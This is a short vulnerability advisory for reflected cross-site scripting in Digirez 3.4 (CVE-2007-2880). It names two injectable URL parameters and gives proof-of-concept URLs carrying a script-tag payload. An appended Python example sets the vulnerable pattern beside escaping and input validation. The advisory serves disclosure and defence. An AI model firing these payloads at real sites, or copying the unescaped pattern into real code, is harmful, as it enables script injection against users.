Bug: Multiple XSS in Digirez


Published: 2007.05.31
Credit: Linux_Drox
Risk: Low
CWE: CWE-79
CVE: CVE-2007-2880
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Hello
Vulnerable: Digirez
Version: 3.4
Web: http://www.digiappz.com

XSS:
1-
http://www.example.com/room/info_book.asp?Room_name=[XSS]
2-
http://www.example.com/room/week.asp?curYear=[XSS]

For example, you can put:
1-
http://www.example.com/room/info_book.asp?Room_name='><script>alert(1);</script>
2-
http://www.example.com/room/week.asp?curYear='><script>alert(1);</script>

Discovered By Linux_Drox
www.LeZr.Com

Best regards,
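
The fix pattern for the two parameters reported above, as an added example that is not part of the original advisory and is not Digirez code. It assumes, from the shape of the `'>` value only, that Room_name is reflected inside a single-quoted attribute and that curYear is a four-digit year; the markup, function names and year bounds are hypothetical.

```python
import html
import re

# Constructed input: the proof-of-concept value quoted in the advisory.
POC = "'><script>alert(1);</script>"

# Hypothetical markup standing in for the page that echoes Room_name.
TEMPLATE = "<input type='hidden' name='Room_name' value='%s'>"


def render_unsafe(room_name: str) -> str:
    """Vulnerable pattern: the request value is concatenated into markup as-is."""
    return TEMPLATE % room_name


def render_safe(room_name: str) -> str:
    """Encode for the attribute context, covering both quote characters."""
    return TEMPLATE % html.escape(room_name, quote=True)


def parse_year(raw: str, lo: int = 1990, hi: int = 2100) -> int:
    """curYear is numeric, so accept only four ASCII digits in an assumed range."""
    if not re.fullmatch(r"[0-9]{4}", raw or ""):
        raise ValueError("curYear must be a four-digit year")
    year = int(raw)
    if not lo <= year <= hi:
        raise ValueError("curYear out of range")
    return year


def render_week_link(raw_year: str) -> str:
    """Only the validated integer, never the raw string, reaches the page."""
    return "<a href='week.asp?curYear=%d'>next year</a>" % (parse_year(raw_year) + 1)


if __name__ == "__main__":
    print(render_unsafe(POC))   # markup is broken out of and a script tag appears
    print(render_safe(POC))     # the same value is rendered as inert text
    print(render_week_link("2007"))
    try:
        render_week_link(POC)
    except ValueError as exc:
        print("rejected:", exc)
```

In Classic ASP, Server.HTMLEncode does not encode the single quote, so a value written into a single-quoted attribute needs the quote encoded as well, or the attribute switched to double quotes.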

Copyright 2014, cxsecurity.com